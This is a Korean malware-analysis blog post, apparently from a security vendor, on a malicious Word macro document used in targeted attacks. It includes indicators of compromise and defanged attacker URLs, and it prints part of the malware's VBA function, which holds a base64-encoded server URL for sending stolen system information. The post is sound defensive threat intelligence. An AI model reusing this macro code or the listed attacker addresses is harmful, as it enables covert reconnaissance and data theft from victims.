타겟형 공격 <사례비지급 의뢰서> 악성 워드문서 유포

APT 타겟형 공격으로 추정되는 <사례비지급 의뢰서> 내용의 악성 워드 문서가 다시 유포되었다. 똑같은 문서 내용의 악성코드는 지난 3월에도 발견되어 ASEC블로그에 관련 분석 내용을 공개하였다. 이번에 발견된 워드 문서는 최근에 만들어졌으며, 기존 공격과 내용은 동일하지만 동작 방식에서 차이가 있었다. 본 글에서는 새로 발견된 <사례비지급 의뢰서> 악성 문서 파일의 기능과 특징, 그리고 동일한 공격자(제작자)가 만들었을 것으로 강하게 추정되는 연관 파일에 대해 설명한다

  • 파일명: 사례비지급 의뢰서(양식).doc
  • SHA256: 811b42bb169f02d1b0b3527e2ca6c00630bebd676b235cd4e391e9e595f9dfa8
  • 최초 작성자: Network Group
  • 최종 수정자: Naeil_영문시작
  • 문서 생성일: 2021-03-02 09:01:00
  • 최종 수정일: 2021-06-07 02:23:00Z

워드 문서의 최초 작성자와 최종 수정자는 3월에 발견된 <사례비지급 의뢰서>와 같았다. 지난 공격에 사용했던 미끼 문서를 최근에 다시 수정하여 이번 공격에 활용한 것으로 보인다.

워드 문서는 악성 VBA 코드로 동작한다. VBA 코드는 안티바이러스 제품 탐지를 우회할 목적으로 html 파일 확장자로 저장되어있지만, 이는 동작하는 데 영향을 주지 않는 부분이다. 3월에 발견된 공격에서는 yml 파일 확장자로 VBA 코드가 저장되어 있었고, 템플릿 인젝션으로 외부 URL을 참조하였었다.

<Relationship Id="rId1" Type=http://schemas.microsoft.com/office/2006/relationships/vbaProject Target="asdgfa.html"

VBA 코드는 Stomping 되어 있으며, 핵심 악성 VBA 함수는 Text 입력 행위(Selection.TypeText)가 있을 때 실행된다. 워드 문서를 오픈하는 것만으로는 악성 기능이 실행되지 않는다. 아래는 VBA 코드 실행 이후 행위이다.

  1. %AppData%\desktop.ini 파일명으로 Visual Basic Script 파일 생성 및 실행
  2. %AppData%\Microsoft\desktop.ini 파일명으로 Visual Basic Script 파일 생성
  3. 시작프로그램 경로에 인터넷 익스플로러(iexplore.exe) 바로가기 파일 생성 (자동 실행 트리거)
  4. 인터넷 익스플로러 바로가기 파일은 %AppData%\Microsoft\desktop.ini 파일을 실행

VBA 코드를 통해 최종 실행되는 %AppData%\Microsoft\desktop.ini 파일은 특정 블로거 주소에 접속하고 본문 데이터를 읽어 실행하는 기능이 있다. 즉, 웹에 업로드된 악성 바이너리를 실시간으로 읽어서 실행하는 방식이다. 현재 데이터는 삭제되었지만, 미리 확보해둔 데이터를 통해 기능을 확인할 수 있었다.

  • 공격자 웹 페이지: hxxps://smyun0272[.]blogspot[.]com/2021/06/dootakim[.]html

받아온 데이터를 이용해 실행하는 최종 기능은 사용자 시스템 정보 유출이다. 감염 시스템을 정찰하기 위한 목적으로 보인다. 공격자 서버 주소는 지난 3월에 발견된 <사례비지급 의뢰서>와 같은 도메인을 이용하고 있었다.

  • (과거 3월 공격) hxxp://ftcpark59[.]getenjoyment[.]net/1703/v[.]php
  • (이번 6월 공격) hxxp://alyssalove[.]getenjoyment[.]net/0423/v[.]php
  1. 현재 Running 중인 서비스 프로세스 목록 수집
  2. 운영체제 정보 수집
  3. .NET 버전 정보 수집
  4. Microsoft Office Excel 프로그램 버전 정보 수집
  5. 최근 실행 파일 목록 수집
  6. 작업 표시줄에 고정된 바로가기 목록 수집
  7. 수집된 정보는 공격자 서버에 파라미터로 담겨서 전송

이번 <사례비지급 의뢰서> 악성 워드문서 파일에서는 공격자를 특정 지을 수 있는 한가지 특징이 확인되었다. 워드 문서에는 정의가 되어있지 않아 정상적으로 실행될 수 없는 VBA 매크로 함수 ‘aaaaaaaaaaaa’ 가 포함되어 있다. 그러나 ‘aaaaaaaaaaaa’ 함수는 다른 타겟형 악성 워드 문서에도 사용된 함수로서, 정상적으로 정의 및 호출 가능한 함수이다. 공격자가 악성코드 제작 과정에서 VBA 매크로 코드를 일부 공유한 것으로 볼 수 있다.

Function ujmlkl()
 On Error Resume Next
    If (qazwsx = 7) Then
    
        vfgbvcd = Application.Version
        uname = Application.UserName
        os = System.OperatingSystem
        sv = System.Version
        rdxvdw = edcrfv(aaaaaaaaaaaa("QzpcXFByb2dyYW0gRmlsZXNcXA"))
        ki87ujhy = edcrfv(aaaaaaaaaaaa("QzpcXFByb2dyYW0gRmlsZXMgKHg4NilcXA"))
        recent = tgbyhn
        dfresxcvfd = aaaaaaaaaaaa("aHR0cDovLzIwMC4yMDAuMjAwLjIwMC90ZXN0L3YucGhw")
        who = "shp"

다음은 동일한 aaaaaaaaaaaa 함수와 이를 호출하는 함수가 있던 악성 워드 문서이다. 동작 방식은 모두 다르지만, 모두 최근에 확인된 APT 타겟형 공격 악성코드이다. 안랩은 이 공격자(제작자를)를 동일한 북한 공격 그룹으로 추정하고 있다.

  • 4/17 – 사례비지급 의뢰서.doc
  • 4/15 – [설문지] 2021 데이터기반 미래전망 연구_(평화안보).doc
  • 4/15 – [설문지] 2021 데이터기반 미래전망 연구_(평화안보).doc
  • 3/25 – 기획설문.doc

현재 안랩 V3 제품군에서는 관련 타겟형 공격 악성 워드 문서를 탐지하고 자동으로 분류하고 있다.

[파일 진단]

Downloader/DOC.Generic
Downloader/DOC.Agent

[IOC]

0821884168a644f3c27176a52763acc9
10b4773a35e693761089a4bddae588eb
49a04c85555b35f998b1787b325526e6
6a614ca002c5b3a4d7023faffc0546e1
95c92bcfc39ceafc1735f190a575c60c

hxxps://smyun0272[.]blogspot[.]com/2021/06/dootakim[.]html
hxxp://alyssalove[.]getenjoyment[.]net/0423/v[.]php

전체 코드와 보다 자세한 기능 설명은 ‘차세대 위협 인텔리전스 플랫폼’ ATIP 에서 제공하고 있습니다.

4.5 4 votes
별점 주기
guest
3 댓글
Inline Feedbacks
View all comments
trackback

[…] 분석팀은 이달 초 타겟형 공격으로 추정되는 악성 워드 문서를 소개하였으며, 최근 해당 유형의 악성코드가 새로운 내용으로 유포됨을 […]

trackback

[…] 하계학술대회 약력 서식파일로 위장한 워드 악성코드 유포 중 – ASEC BLOG ASEC 분석팀은 이달 초 타겟형 공격으로 추정되는 악성 워드 문서를 소개하였으며, 최근 해당 유형의 악성코드가 새로운 내용으로 유포됨을 확인하였다. 악성코드는 아래와 같이 메일을 통해 유포되었으며, 국내 하계학술대회 관리자를 사칭하고 있다. 메일에는 ‘[** 하계학술대회]_양력.doc’가 첨부되어 있고 해당 파일 작성을 유도한다. 메일에 첨부된 워드 파일은 아래와 같으며 악성 매크로가 존재한다. 문서의 작성자와 수정자 모두 이전에 발견된 ‘사례비지급 의뢰서’와 일치하며 동일한 공격자의 수행으로 추정된다. (https://asec.ahnlab.com/ko/24220/… […]

trackback

[…] 사례비지급 의뢰서(양식).doc  (6월 9일 ASEC블로그) […]